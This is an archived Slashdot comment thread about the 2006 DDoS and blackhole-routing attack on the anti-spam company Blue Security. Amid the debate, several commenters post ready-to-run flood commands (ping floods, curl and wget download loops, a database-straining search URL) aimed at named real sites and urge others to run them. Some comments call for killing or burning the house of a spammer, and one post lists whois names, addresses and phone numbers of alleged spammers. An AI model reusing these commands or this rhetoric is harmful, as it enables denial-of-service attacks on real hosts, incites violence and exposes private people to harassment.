Slashdot Mirror
What Happened to Blue Security
shadowknot writes "Blue Security has published a detailed account of the attack on their servers perpetrated by spammer "PharmaMaster". The attack included a DDoS attack on the Blue Security operational system and a Black Hole filtering attack on the Blue Security website. From the article: "The first attack was to block worldwide access to Blue Security's corporate website (www.bluesecurity.com) by tampering with the Internet backbone using a technique called "Blackhole Filtering". The Second attack was a DDoS attack on Blue Security's operational system."
They deserve a break.
Slashdot Burying Stories About Slashdot Media Owned
Come on, if you have never used Bluesecurity, then you were obviously not in their database, and your email could not have been leaked to the spammers! Obviously, the spammers just sent out these FUD spam mails to everyone, just like spammers generally do.
[May 3rd 16:43 GMT]
PharmaMaster Strikes Again, Takes Down Tucows
PharmaMaster starts another attack and takes down Tucows's DNS servers which were serving thousands of sites, including Blue Security's. Tucows terminates Blue Security's account in an attempt to stop the attack.
And it was't all that long ago that DNS vulnerabilities were under discussion. Attacking a DNS server not only takes out the site intended, it has the bonus of collateral damage. Imagine the chagrin of all the other sites served by Tucows when they all go down en masse and imagine the PR campaign that Blue Security is going to have to wage to get any credibility back.
GetOuttaMySpace - The Anti-Social Network
Have you even been following this issue? They didn't have a list leaked...
Isn't the fact that you, a non-user, got the email proof enough that nothing was leaked? Unless the spammer "hacked" your address from a list it wasn't on (which would be a neat trick) he or she was just spamming everyone available, hoping to get Bluesecurity's users along with it.
Slashdot Burying Stories About Slashdot Media Owned
Even if the servers were temporarily downed, the publicity generated from this incident surely got quite a few new members.
Heck, I even signed up; shall have to wait and see if it's worth it though.
Someone used their tool to clean a list, then compared the clean list to a "pre-scrub" list, which means they didn't gain any email addresses, they just learned something about the emails they already had been sending spam to.
Don't quit Blue Security. My philosophy boils down to "millions for defense, not a penny for tribute" (Jefferson).
What is the name and location of PharmaMaster? I'd like to see him DDOS his way out of a crowd of angry villagers carrying torches and pitchforks.
See- that is the rub. When I heard about the company, I emailed their techs a few times to learn about the project. I decided not to use them simply because I feared this type of event, and didnt want my email box doomed to this kind of fate. Good thing they saved my email address for later use.
If a nation expects to be ignorant and free, in a state of civilization, it expects what never was and never will be.-TJ
So who is Pharma master? With all the info that's been compiled on the top spammers, isn't this guy in ROKSO yet?
Lets find him and show him some "affection".
Yeah. I emailed their techs twice to ask some questions, but decided not to use the software to avoid exactly this. Good thing they saved my email.
If a nation expects to be ignorant and free, in a state of civilization, it expects what never was and never will be.-TJ
So, which Tier-1 ISP is having their name withheld? Any ideas?
It seems that, with more people using bluefrog, the defense will become more effective.
Looks like Tucow really behaved badly. They cancled an account of a legimite user instead of defeating the attack. The should never have given into the spammer's demands.
Apparently spammers are lining up to help out Pharmamaster from the SpecialHam forums. Digg.com users yesterday attempted lauching multiple types of bandwidth vampirism and DDOS attacks on SpecialHam yesterday as well. http://digg.com/technology/SPAMmers_really_pissed_ off_at_bluesecurity,_read_their_message_board
>Blue?s operational team reports on more symptoms supporting PharmaMaster's claims that the backbone of the Internet was compromised (blackhole filtering at the backbone level).
No offence to the Blue guys' disrupted service, but I think this is the most interesting bit. I wonder whether this description is correct and if so, how the spammer achieved THAT.
I signed up over the weekend, but never got a confirmation email. I'd like to use them, but I can't forward emails until I get a conformation.
You're an idiot. No one "gave" anybody an email list. If you signed up with Blue you agreed to have them submit "opt-out" requests on your behalf at spam sites.
Read before you type, moron.
What happened was that the spammer complied with instructions from Blue Security to download a program that washed Blue Security protected email addresses from the spammers' sucker list. When theis program was run on the spammer's email list Blue Security email addresses were purged. The spammer simply compared the purged list against his unpurged list and listed all the email addresses that were removed. He then sent the threatening emails to any email address that was purged from the original list.
Blue Security is up and running again. Not only will I continue to use the Blue Frog, I will also promote it now. I do not like bullies, and will do whatever I can to stop them. Blue Security and others that help people punch back against spammers should be commended. I myself have written a signed applet that also punishes spammers.
One can look at it by visiting http://www.plaza1.net/SpammerSlapper .
The applet is GPL, and the source code is embedded in the applet. If you do not want to actually punish spammers, do not accept the certificate. I am also thinking about creating a java application that works in a similar way to Blue Frog - only the complaint instructions will be distributed via a peer to peer protocol and cryptographically signed. Any ideas on this one?
Yup, really good thing that people like you give in so easily to the spammers. You make me sick!
Freedom is not worth having if it does not include the freedom to make mistakes. - Mahatma Gandhi
What's "blackhole filtering"?
I tried downloading their software and signing up with them over the last week.
Figured if a spammer is that pissed off at them they must be doing something right.
The sign up site was often down, but when it was up I always seemed to fail their captcha.
Did anyone have more luck?
this is a really cool story about how a company handled a DDoS attack by organized crime.
xkcd.com - a webcomic of mathematics, love, and language.
The DNS vulnerabilities are not hurting Blue Security's credibility!
That a hacker had to use a sledgehammer to cause them signifigant harm shows that Blue Security was/is doing something correctly.
The group that will need to gain back credibility, are the organizations that are the operating these vulnerable DNS servers because it's their vulnerability that allowed such signifigant collateral damage.
The Blue Security gang apparently never give out email addresses, just md5'd strings of the email addresses to be excluded.
That service is not operational yet. They said it should be "soon".
"terrorism" and "pedophilia" are the root passwords to the Constitution
at least, that's the way it seems to be described.
He tried to kill me with a forklift!
shameless from digg, but an easy redirect for /.ers without having to read digg's stuff:
information week's take on it makes it seem less, well, amazing on the part of the spammers.
http://www.informationweek.com/story/showArticle.j html?articleID=187200875
When you read Blue Security's press releases, it seems obvious they are a little on the desperate side, trying to figure out how to deal with this Pharmamaster character who has reduced their network to its knees. What's unfortunate about the situation is that it calls the light the sad state of backbone administration where the major providers can't or won't do anything about the situation, and a company is left trying to appeal to the general public to do something about it.
Of course if the attack had occurred against a company like General Electric or Eli Lilly, the perpetrator would be in jail right now.
It seems obvious the perp is an American. It shouldn't be that difficult to track him down, especially since he's IM'ing the victims.
Wow, if this is a detailed timeline, I'd hate to see the summary.
"Some shit happened."
As a security guy, this could have been really interesting, but it's not.
PharmaMaster starts another attack and takes down Tucows's DNS servers which were serving thousands of sites, including Blue Security's. Tucows terminates Blue Security's account in an attempt to stop the attack.
[May 3rd 23:23 GMT]
PharmaMaster Boasts Success
Tucows is a company I will never recommend or use to host any of my domains.
Caving in to a spammer/hacker retaliation will not garner much support.
http://www.joker.com/ serves my needs well
Rick B.
Enquiring minds (and all that) want to know.
This was truly lame and inexcusable - redirecting the attack from themselves to someone else.
Notice that the bluesecurity.com website was *NOT* being flooded with packets. On the countrary, it was routed to null for all the internet except Israel. In summary, there were 4 different DOS attacks:
* Packet flooding (lots of traffic) the operational servers (the ones doing the opt-outs)
* Null routing blue's www (no traffic)
* Packet flooding the redirected www at Six Apart (lots of traffic)
* Packet flooding Tucow's DNS servers (lots of traffic)
So, technically, blue security didn't redirect the attack.
They were pretty successful at it, they got it really slow before the rehosting at a University. They also made the forum cancel registrations and blanked a few gateway pages, which had to be a bit of a nuisance to the spammers. See it here.
This ferocious attack on Blue Security as well as Typepad and TUCOWS is proof that Blue Security's tactics are working. Spammers are scared to death of Blue Frog because it forces them to comply with the spirit of CANSPAM (since it is worthless in practise). They are so desperate that they are damaging the internet backbone to slightly increase the limited time that spam will be profitable.
/. comments urging you to stay away from Blue Frog. Spammers do not have Blue Security's member lists - they are simply DIFFing their entire lists with the opt-outs sent by Blue Frog and sharing their filters with the "mailer community". Yes, some members (not me) have been threatened with, and temporarily recieved, more spam. However, this can't last since spammers who do this are simply fighting fire with gasoline! The more spam Blue Frog users get, the more opt-outs the spammer and client recieve which costs them time and money! Plus, regarding threats to leave Blue Frog, does it make sense that a spammer would remove ANY working email address for ANY reason?
/.er to sign up for a Blue Frog account RIGHT NOW (or whenever they're not getting DOSed) and simply forward your spam to yourusername@reports.bluesecurity.com. You can wait a day or two and send many spams as attachments in one email, or you can let the resident client do it for you. It's so easy and the headlines prove that it really does make a difference.
/.ers, as an informed userbase, to stand up for those internet users who don't know how to stand up for themselves.
Do not listen to FUD-spreading ignoramuses who will no doubt leave many
Who do you trust to solve your spam problem? Microsoft? Your government? If they really cared, wouldn't the problem have have been solved long before spam encompassed 90% of all email? Blue Security offers a realistic, fair, assertive, and EFFECTIVE means of hitting spammers where it hurts - in the database and in the pocketbook. They need your help to make spam an unprofitable, inconvenient vehicle for advertisers.
I urge each and every
Spammers are childishly thrashing around the internet like a bull in a china shop, having a flailing temper tantrum because people dare to stand up for their privacy. It is the duty of
We have the numbers and the motivation. Aren't you sick and tired of these rich criminals wasting our time, defrauding our elders, and endangering our children day after day? If we stand together, just as the spammers stand together to attack Blue Security, then we WILL win.
Sign up for a Blue Frog account ASAP and encourage your friends and family to do the same, as I have. And if you think it's possible to reason with spammers, check out this CastleCops forum thread that shows inside conversations from a spammer message board.
Those spammers will threat e-mails if you unsubscribe or not, so don't unsubscribe. They're doing this because it's hurting it in their pocket. Big deal. I don't give a damn if a spammer can't buy a new humvee limo, and I don't have to support those scumbags. So if they want to fill my mailbox with with their trash, so be it. I will not bend over to them. I will not unsubscribe. I will not let those fscking bastards tell me what I should do.
...they must be doing something right! I'm signing up.
Thanks PharmaMaster for referring me!
Not that I think that they would bother with a spammer but a guy can dream can't he?
MMO Quests are like orgasms:
You may solo them, I prefer them in a group.
I've signed up with them about four months ago and saw the spam on my "protected" accounts go down by about 50%. It doesn't kill all the spam, but every bit helps.
/dev/null is a special device and it is nothing. If you write to it it goes nowhere just disappears.
Common joke is that you backedup to /dev/null because it had plenty of space.
I don't think windows has a similar function readily available.
So what do you use it for? Well when you have something that needs to output to something and you don't want it. Commonly used in scripts that run automatically to throw away unneeded messages.
As for how and why routers should have this. No idea. Sounds odd that you could get a router to discard its data.
MMO Quests are like orgasms:
You may solo them, I prefer them in a group.
One of the world?s largest spammer?s, ?PharmaMaster?
This was from IE 6.0.2800. As I'm at work I haven't looked in Firefox to see if it's equally retarded..
If they can't write HTML that will display properly in all browsers, particularly with the one 80% of surfers use, can they really be "good with computers?"
And if the question mark in "spammer?s" is supposed to be an apostrophe, they're not only incompetent but illiterate.
Perhaps the spammer took them on because they were an easy mark? These folks should hire a web designer that knows HTML and what it's for (hint: conveying information), and if that one question mark is supposed to be an apostrophe, a copyrighter who isn't a retarded illiterate.
However, the fact that they were complicit in the spammer's taking blogs down also shows their lack of competence.
That said, who is this "PharmaMaster?" I'd like a real name and meatspece home address so I can forward all of my snail junk mail to him and encourage arsonists to burn his house down preferably with him in it. It's time for a little bloody vigilantism, folks. Lets kill some spammers. Blue Security, who is this guy and why are you helping him stay anonymous?
Is to kill the spammers. Obviously the death penalty doesn't resolve the issue forever, or we'd not have as much crime as we do in the world, but it will deter most spammers.
We put down rabid dogs because they have the potential to harm human beings despite having no intention to do so. Why is it less humane to remove life that actively and maliciously harms others?
Hi,
I haven't really paid attention to the "attack actual spam messages" front.
How is this any different from forwarding my email to myspamaddress@spamcop.net?
We recently had heard in the office over one of the Yellow Machine that's made by Anthology Solutions.
...and show him my SIG. [DUKE NUKEM MODE]Come get some[/DUKE NUKEM MODE]
-"...bad old ideas look confusingly fresh when they are packaged as technology" - Jaron Lanier (Digital Maoism on Edge.o
An InfoWorld article from May 4th quoted Blue Security CEO Eran Reshef as saying:
Since Blue Security is now referring to "tier-1 ISP name withheld", that means one of several things:I had almost dismissed bluefrog as yet another spam control tool. Now I now I know it is really hurting them. Signed on as soon as their servers allowed me. I can't wait until they get fully online again to finish generation of my account.
Thanks Pharma!
My other OS is the MCP!
If you must!
Here's that command for you:
(linux) ping -i 0.2 -w 0.2 -s 65000 www.specialham.com
Because I know some people who would happily beat him to within an inch of his life, THEN put him in public stocks for a few years.
The guy as well may just put up a ginat banner proclaiming that he's a wold class jackass.
Most owners of spamvertised sites do NOT want traffic, they want money. They only want the .01% of spam victims who are stupid enough to buy their crap to visit their site to complete the sale. However, in order to get the orders for their profit, they have have a place where users can come to. This place is their website. Website owners have to PAY for bandwidth consumption. Traffic consumes bandwidth. Therefore traffic is an expense. What the website owners really want is orders that bring in money.
When a site receive traffic from those who do not buy, it is the same as a store which has 200 people just looking around (and not buying). These browsers cause wear and tear on the carpet, require the watchful eye of security, require resources to answer questions, and make it more crowded so that it is more difficult for paying customers to find what they are looking for and complete the transaction.
Right now, the ratio of revenue-generating traffic (those who come to a website to buy) verses the non revenue-generating traffic is high enough to justify having the website running and paying the spammers. When there is 8 gigs of traffic (non revenue generating) from spam haters for every byte of revenue producing traffic, then advertising a website via spam will be very UNPROFITABLE. When those who advertise by spam see loss instead of profits, they will quit paying spammers (or stop spamming themselves). This is why spammers hate the likes of Blue Security, SpammerSlapper, SpamFryer, and other retalitory tools.
What the spammers do not realize is that people who are ready to resort to using such antispammer tactics DO NOT like spamvertised websites nor will they buy crap from these websites. Blue Security is actually doing spammers a favor by pointing out the email receipients who do not want the spam and are willing to cause problems. If I were a spammer, I would want to listwash my sucker list and get rid of the email addresses of troublemakers and concentrate on the idiots who buy stuff advertised via spam. That way I would have to send out a lot less spam to get the sales I want. Spammers should go only after the suckers and leave the rest of us alone. When these nooby suckers decide that they are tired of being robbed and spammed into oblivion, they can then add their name and voice to the rest of the angry masses who have HAD ENOUGH.
From:http://72.14.207.104/search?q=cache:daxdV_-e7 aQJ:www.cisco.com/warp/public/732/Tech/security/do cs/blackhole.pdf+Blackhole+Filtering&hl=en&ct=clnk &cd=1
Benefits of Remotely Triggered Black Hole Filtering
Black holes, from a network security perspective, are placed in the network where traffic is forwarded and dropped. Once an attack has been
detected, black holing can be used to drop all attack traffic at the edge of an Internet service provide (ISP) network, based on either destination
or source IP addresses. RTBH filtering is a technique that uses routing protocol updates to manipulate route tables at the network edge or
anywhere else in the network to specifically drop undesirable traffic before it enters the service provider network.
RTBH filtering provides a method for quickly dropping undesirable traffic at the edge of the network, based on either source addresses or
destination addresses by forwarding it to a null0 interface. Null0 is a pseudointerface that is always up and can never forward or receive traffic.
Forwarding packets to null0 is a common way to filter packets to a specific destination.
To help out with Digg's effort, visit this page: http://konspence.com/specialham/artistcopy.htm. Just leave it running all day, you'll use a few hundred MB of bandwidth on your own.
I'm including a link to BlueFrog in my signature of my emails.
It may be true that the dealth penalty may not reduce crime rates. But, the dealth penalty reduces recidivism rates.
Fight Spammers!
For those new to this whole "BlueFrog" story, unsure who is the "good guy":
Pro:
Con:
barack to the future?
(Windows) ping www.specialham.com -l 65000 -t -w 0
Web 2.0 == Giant Blogspam Circle Jerk
I didn't get one of these threatenign emails, which is a pity as I have been a member of bluesecurity for a fair old while (well, since mailwasher added it to their anti-spam services).
:( but I'm sure it won't last.
I feel a bit left out now
I know you can use MailWasher Pro www.firetrust.com to report spam to Blue Security. Quite a bit easier than forwarding all your spam to them directly.
Oh yea...you can read about it here...
http://www.codemonkeyx.org/?p=19
If you must!
Bottom line the advertisers know how their money is being spent. There's no excuse which allows them to claim ignorance. Once they are sued they'll look into it if they don't already know. The advertisers are funding this type of illegal behavior and so they should be held accountable. Large lawsuits or even criminal prosecution. These spammers and those illegally compromising the backbones are acting as agents of the advertisers, period.
You can lead a man with reason but you can't make him think.
That thread is great ... I wonder about the Oslo university thing (that's where they've now moved their server to). If anyone here speaks Norwegian and wanted to write them a letter, contact info is on the Digg page. I'm surprised it hasn't gotten taken down already, but maybe the sysop there doesn't read English (I assume all the Digg'ers have been writing in English...).
:; do curl -o /dev/null http://www.northworks.biz/install_mc_shareware.exe ; done
They also read through the forums and found some of the actual spammers' websites:
http://www.northworks.biz/ This one is one of the shadiest, they're selling email harvesters.
In case anyone wants to take matters into their own hands, as one of the Digg people pointed out, there's always:
while
His bandwidth bill is going to suck this month...
"Ladies and gentlemen, my killbot features Lotus Notes and a machine gun. It is the finest available."
Not too mention, the actions of pharmamaster are borderline terrorism. (just in case the NSA is watching ;) Not even freedom fighter terrorism, just good old fashioned fearmongering terrorism.
Just call UUNET Spam Support Services and ask.
Bluesecurity's email list wasn't comprimised. If you signed up for bluesecurity you did so because the spammers already have your email address. Many people who never heard of Blue Security also recieved these emails which is just further proof that PharmaMaster simply used his existing mailing list to send these out.
If you must!
That's all, UNICODE vs ASCII, I don't remember why it does that. I think IE doesn't support the standard is the problem.
These attacks do NOT mean Blue Security is doing something correctly.
The attacks DO show that Blue Security has been successful at pissing off their target.
I still haven't recieved mine either. However, I did install the client, and it seems to have created me an account. The password must be in the e-mail, but until then the client will log me in to the website. Also, it seems to keep track of the spam that I have forewarded it through both manual forewarding and the Firefox extension.
Bluesecurity (BS) are either confused or misleading people.
There is no way that a single "backbone" provider could have installed a null route to block all traffic to their network. Bluesecurity is served by a Haifa-based provider called Netvision (Autonomous System number 1680). Netvision buys internet transit from four providers:
--UUnet/701 (uunet north america)
--UUnet/702 (uunet europe/middle east)
--btn/3491 (beyond the network)
--telia/1299 (telia sonera international backbone).
what the heck is BS claiming? that *all* of them installed a null route at once. do they even know what a null route is.
i'm getting annoyed enough at this nonsense to think about blogging about it in more detail over at www.renesys.com/blogs . perhaps later today.
foolishness.
Does anyone know when Blue Security will be fully functional again? There are still some services that don't work, as I'm writing this. Namely:
Coming Soon:
Validation emails
Online Statistics
Developers site
Outgoing email from
Blue Security
Partially working:
SMTP Spam reports
Those are not vigilantes. They are freedom fighters. Words matter. Let's use the right ones.
To me, the whole think smacks of PR fraud on Blue Security's part. Not buying it at all. It has the smell of fried potted meat.
If you want news from today, you have to come back tomorrow.
LOOK at the HTML (it's down in the timeline) there are no entities. Here, I'll paste: (from FF at that (Opera is the same)):
PharmaMaster Works to Block Traffic to Blue?s Corporate Web Site
One of the world?s largest spammer?s, ?PharmaMaster?,
It might be an encoding problem on their end, but regardless, it is in fact, on their end.
Clones are people two.
<sigh.> I presume you meant to say copywriter. Nice try though.
<sigh> again. Read elsewhere in this thread -- they were blackholed to start, so shifting their record to another IP presented no immediate threat to wherever they were moving to. The DDoS only started after they shifted IPs.
"What in the name of Fats Waller is that?"
"A four-foot prune."
Great... so by subscribing at blue security I can force the spammers to multiply their bandwidth by 20-40 ? Sounds like a DDoS for me. :)
I think you forget that DOD and for that matter most of the Military have their own backbone where they carry any data that is of importance to them, the only data they would carry over the "regular" internet would be wesite info and maybe emails.
for windows users via a proxy:
:starte --proxy-user
:starte
:-)
@echo off
set http_proxy=http://yourproxyhereifapplicable
rem remove the above if you don't have a proxy server
wget http://www.northworks.biz/install_mc_shareware.ex
=username --proxy-pass=password
goto start
without a proxy:
@echo off
wget http://www.northworks.biz/install_mc_shareware.ex
goto start
(save as s batch file in the same dir as wget)
download wget from www.gnu.org/software/wget/
have fun
whoops, that'll eat your harddrive, sorry. ./foo" to the end of the wget (minus quotes)
add "-O
A variation of this technique is to route packets to an internal "blackhole router" instead of to Null0. This consumes a little more resources than the Null0 option but still far less than an ACL. The blackhole router does nothing else other than null routing the traffic. It can also be used to route the traffic to a sniffing device to give the admin an opportunity to see what the malicious traffic really was. The blackhole router can also advertise internally the blackhole routes. This is useful when you network policy prohibits making changes to critical hardware such as a border router without sufficient peer review. Often when you must null route something you must do it in a hurry (ie, a customer is being attacked). Being able to make the changes on a non-critical box (the blackhole router) and having the routes changes propgate up to a critical piece of hardware (the border router(s)) is very useful.
Another reason to use them is to prevent routing loops. Lets say for example you have an access server terminating dialin customers. You've loaded out your AS with 192 modems. A /24 has been allocated for this AS. Your AS advertises that /24 with OSPF back into the core of your ISP network. However the AS's routing table doesn't contain a route for all 253 of the useable IPs in that /24. Instead individual routes are added as individual users dial in. Lets say a packet comes in that's destined for an IP that isn't in use. The AS looks at its routing table and says to itself that it doesn't have a route to that IP. It falls back on its default route which is the router upstream of the AS that just routed the packet to the AS. Rinse and repeat. A routing loop ensues.
Sometimes in BGP you have to have a static route to a given netblock to turn around and advertise it. You already have internal routes that would ultimately route the packet to the right destination. However to get BGP working you have to create a specific route. You can simply create a static route to that subnet via Null0 with a cost of 254 and make BGP happy.
There are dozens of examples of why you need null routing. Does that help? You can search on Cisco's website for additional references.
I wonder if Todd Underwood at Typepad will have the balls to apologize for the bull he was spreading about Blue Security deflecting a DDOS attck onto their servers as well as not believing that Blue Security had been blackhole filtered.
How about it Todd? Ready to blame the criminal and stop blaming the victim or what?
*sigh*
way to screw up the batch file...
the ":start" bit should be on a line by itself.
I'd probably do that too if I were an astro-truffer for a sleazey spammer, instead I'm going to down-load the linux version of the bluefrog client and connect it to my spam account and let it run. In fact I'm probably going to engage in activities designed to get those accounts on as many spam lists as is humanly possible. I've got accounts at yahoo and gmail that get about 10 spams for every legit email, maybe I can get the clutter down to the point where they'll actually be usable again.
Apocalypse Cancelled, Sorry, No Ticket Refunds
I'm mailing this via the postal service today:
May 8th, 2006
Tucows, Inc.
96 Mowat Avenue
Toronto, ON
Canada M6K 3M1
To whom it may concern,
I just wanted to express my extreme disappointment regarding your recent actions to disable Blue Security's account in an attempt to stop the attacks of a notorious spammer. I fully understand that the attacks were a technical nightmare for your team, however, it is unbelievable that you would rather give in to a criminal and follow their demands and step on an organization that aims to protect innocent citizens from around the globe. Regardless of what your motive was, this action clearly states that you are more interested in profit than you are about ethics. As a result, I am recommending that all contacts I have that use Tucow's services remove their accounts and utilize a service which supports consumer protection. It is my sincere hope that should a similar situation arise, you will think of the company that is trying to protect the Internet.
I attempted to forward some spam i've been getting, but was denied because my account isn't verified yet.
I got over 1600 total new spam messages in 2 of my accounts protected by blue security. All but 4 where sent to my spam folder. Spam has increased, but gmail's spam filters worked like a charm!
I saw that somewhere... oh yeah Steve Ballmer, Linux seller of the year! :)
No sig for now.
The reference is from the old days when microwave radio links were in pervasive (althought there's still quite a few in service). "Fading" is when atmospheric conditions cause the received radio wave to drop in intensity, as in fade away. Heavy rain, fog, temperature inversions - all common causes.
:-)
However, in the case of backhoe fade, the signal drops off instantaneously
"A little misunderstanding? Galileo and the Pope had a little misunderstanding."
Running strings on that, it seems to be packaged with http://www.tarma.com/ packager. Has anyone sandboxed the app itself and pulled that scumware apart?
They are truly scared.
This is a very potent weapon against spam.
It turns the tables on them, for every message they send, they get
a reply. This breaks the economy for spam. They know it and are
lashing out with every thing they can think of. Problem is, some of
thier tricks are very illegal and are going to land a few of them in the can.
They use zombies to send the spam for free, but somewhere, someone has
to recieve the emails of suckers falling for the scams, if that box fills
up with remove-me mail, the client is not going to make any money.
In reality it is going to cost them bandwidth charges. If spammers send
a million emails and substantial number of those reply, the whole thing breaks.
Hopefully there will be several new anti-spam efforts using Blue Frog's model.
This really has to potential to finally make spam unprofitable.
I've signed up, and will be making my email public from now on.
Starman97@gmail.com
Starman97@Gmail.com (bring it on spammers)
I think the BS guys should release some kind of distributed software, which could be used to distribute their traffic all over the world. I would be glad to give away some of my bandwidth, and probably many of you would do it too. I know it didn't work with Lycos screensaver, but maybe it could work this time...
LOL!
Sure we don't let our software be used by spammers!
Apocalypse Cancelled, Sorry, No Ticket Refunds
TTL on www.specialham.com is currently 600 and they're changing IP constantly. What was their IP before these cowardly retards started running away?
Lets call their bluff. Do this experiment yourself. And use Blue Frog.
Say Blue, if you ever have free time again, a Mac version would be grand.
FSM, grant me the serenity to preview that which I cannot change...
The fact that Tucows would kick one of their customers to the curb in a pathetic attempt to pacify a blackmailer/spammer/terrorist is shameful, short-sighted, and tragic.
While the spammer is clearly worthy or our scorn, I believe Tucows is even more deserving of public shame and disgrace. I expect a spammer to spam, I expect a hacker to hack, but I do not expect a (formerly) respectable business that takes my money to sell me out to criminals! Yes, I know they claim it was to protect their other customers, but tossing your baby to the lion to keep it from from attacking everyone else is reprehensible and I thought civilization had progressed beyond this.
I for one, will NEVER use any of their services or web properties again unless they issue a public apology for their actions. Not just to BlueSecurity, but to all of their customers, because this clearly sends a signal to all would-be DDoS attackers that Tucows customers are for sale for the price of a few million IP packets!
I could totally believe it's UUNet. Pretty much the most evil, pro-spam ISP on the internet. And they have been known to use the legal system to attack anti-spammers in the past.
- It's motivation was profit
- It's methods were criminal
- Intimidation - the letters to users threatening a deluge of spam if they did not withdraw from Blue
- Vandalism - courupting the DNS/routers to blackhole the address is technically vandalism
- Bribery? - I can't think why else a backbone provider would blackhole a legitimate company (unless it was a hack in which case we have computer intrusion instead)
- It's technique was criminal
- DDOS attack on Tucows & blog host.
- Transmition of a threat over telcom lines - whatever you say - those trans-oceanic lines are telco lines.
If I understand the law correctly, if even 1 US customer of Blue was sent that Email, then the FBI can build a case. Right now I see, unauthorized use of computer services (DDOS zombies), Blackmail (the threatening letters). I can even see DHS trying out a few of those nice new terrorism laws.And yes, the US can & has requested extradition of people under blackmail & extortion charges, whether the 'russian speaking' country will grant the extradition is another matter - Note that if the request is made - the moment he steps into a country with extratidion he can be extradited to the US and he may or may not be allowed to talk to his embasy before it happens.
Personnally I liked the solution of $50K to the russian mafia to ruff him up, but I'm the vindictive type who likes poetic justice.
proof, n. A demonstration that a conclusion is implied by certain premises and axioms.
Posted A/C (despite deserving karma for hauling this crap past the lameness filter), because I cannot verify that this is the content from the specialham.com forums; the original forum posting thread (indicated via digg) has been removed and disavowed by the forum maintainer. However, Googling for a couple phrases that were quoted on Digg turned this up:
I'm not so sure that SPAM will be unprofitable.
I'm not so sure that SPAM is profitable today.
Now, selling methods to SPAM people... that's certainly profitable. Even if SPAM doesn't work.
http://www.specialham.com/specialham/searchpro.asp ?phrase=list&appid=ALL&topicreply=combined&message =both&author=&timeframe=%3E&timefilter=-1265&langu age=single&top=3000&criteria=OR&submitbutton=+OK+
Try that on specialham also... I played around with the text search query string, had it look 5 or 6 years in the past and pull 3000 records. A few hundred of these queries will probably bring down the db to a crawl.
Only for some type of spam, message placement will still go out.
Stuff like Political ads and prosletyzing where no response is needed
will still go out. But anyone trying to sell some questionable product
from a website or email drop is not going to want to get hammered with the
return of a big percentage of the spam emails.
Phishing and other forms of identity theft are also going to be a lot harder.
If you go to the Bluesecurity site, you'll see they have multiple classes
of spam and responses to each class. Some stuff gets bounced to the FDA, some
to the BSA, even some to MPAA. Childporn looks like it goes to Interpol.
I have no illusions that it will get rid of ALL spam, but it will put the hurt on some spammers and that's 100% better than just trying to filter or ignore the incoming spam.
Starman97@Gmail.com (bring it on spammers)
Actually, this has happened many times, and it is called a Joe Job attack. This is why it is important for spam vigilantes to investigate before taking action. This is one of the things that Blue Security and I with my application do before submitting complaints. Websites that are spamvertised tend to have certain unique characteristics that indicate that they are run by unsavory characters.
1. Registration information not accurate.
2. Website does not list an accurate telephone number or physical location.
3. Information listed on website is not accurate.
4. Website claims to use SSL and does not.
5. Website has logos of one or more certificate authority when it uses something
different or nothing at all.
6. Website offers a product or service that is dodgy or a too good to be true price.
7. The webpage code is the same or very similar to other known to be spamvertised
sites.
8. Website claims membership with a well respected organization when in fact it has no such member.
A website with one or even two of these (depending on which ones) indicators may be innocent, however more than that indicates spam.
You don't have to read the forums (which requires registration). There are plenty of sponsoring advertisers prominently displayed on the specialham.com web pages. If they sponsor the thing, why not send some other business their way too? Whois is your friend, assuming any of this is valid:
:LWKBSC:K KLH SKLDJHKLABKCNASDC LKJAHDKLJH LKSADH KLJASD LKASND KABSFLKJGFHQ:JHW:LJHLKN KB,cmbzlkjH lkjha qlkwjeb lkJHlkjh WLEKJH LWKjeh lkjWH ELKNWLKNLDKJBsdb,.SDB Kbwe kbwlkjlwkejhWLKE. zx,cmnsasdf lkjh alkjhr elkjahlrekjh alkjr lakjdfhlkajdhfkljadhfkl jasdhflkasdhfjk asdjklfhasdjklfhajklsdh fjkla hfklafvNZcnm,vbkladfhjkah lfjkhlkajdhflk jasdhfjklha sdklfjhlaksdf.
Domain Name: S-RX.US
Domain ID: D9372348-US
Sponsoring Registrar: ONLINE SAS
Registrant ID: BMN-127000
Name: Frederick MAGNUSSEN
Address1: 1081 Yorkshire DR
City: Carrollton
State/Province: Texas
Postal Code: 75007
Country: United States
Phone Number: +1.9726581544
Email: funoconne@yahoo.com
Domain Name: BULKER.BIZ
Domain ID: D9517892-BIZ
Sponsoring Registrar: ESTDOMAINS INC
Sponsoring Registrar IANA ID: 832
Registrant ID: DI_1374532
Name: Hasan Aly Polat
Organization: Hasan Aly Polat
Address1: Sair Esref Bulv. 27
City: Izmir
Postal Code: 35201
Country: Turkey
Phone Number: +90.2324897325
Email: queencyman@hotmail.com
Domain emailsupply.net
Owner's Contact Information:
Manila Industries, Inc.
3843 S. Bristol St. #628
Santa Ana, CA 92704
Phone: 949-743-1697
Email: manilaindustries@excite.com
Domain ID:D98216152-LROR
Domain Name:BULKMAILS.ORG
Sponsoring Registrar:Dotregistrar.com (R114-LROR)
Registrant ID:114453-R
Name:Domaincar c/o Perthshire Marketing
Street1:Trident Chambers, Wickhams Cay 1
Street2:P.O. Box 146
City:Road Town
State/Province:Tortola
Country:VG
Phone:+1.7344134989
FAX:+1.7344134989
Registrant Email:info@domaincar.com
Domain mmailer.net
Registrant
Robert Martin, 3616 Far West Blvd, Austin, TX (US)
78731
Administrative Contact
MainStream Mails LLC, Admin Dept
# 249 13 Summit Square Center, Langhorne, US
19047-1098
215-579-4669
slamelza@mainstreamemail.com
Stupid lameness filter. Why do I have to put all this in just to avoid the 'junk' characters complaint? Now it's complaining about too few characters on a line. Is there some easy way around this silliness? The least it could do is be more specific about what it needs to be acceptable. I took off the registration dates and some whitespace to try to make it happy, and then added this fluff -- sorry: LKJHADF LKAJSHD LKAF
Blue Security was perfectly willing to have thousands of innocent third parties suffer collateral damage. In this particular instance, both the original spammer pharmaster and blue security are the bad guys.
lame analogy time
If you, mr hatfield, get in a shooting war feud with your neighbor mr mc coy down the block, he shoots first then you start shooting back, and the smith, jones and farsnworth families all get shot in the ensuing gun battle because you kept cutting into their living rooms for a firing advantage, can you say who all the bad guys are? Blue security is a "security" company, they can't claim stupid and say "gee, we never thunked that anything else might happen" to the other folks at tucows and typead. OF COURSE it could have escalated over there, and *it did*. You would have had to be a raw net n00b to not see that coming as the next step, a DDoS.
They should have just sucked it up and waited it out for a few days and not involved those other places in the war. Homey ain't buying that "whoops collateral damage" bullshit.
